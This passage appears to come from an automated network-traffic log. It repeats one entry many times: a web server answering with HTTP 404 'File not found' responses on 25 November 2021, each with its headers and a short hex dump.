        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
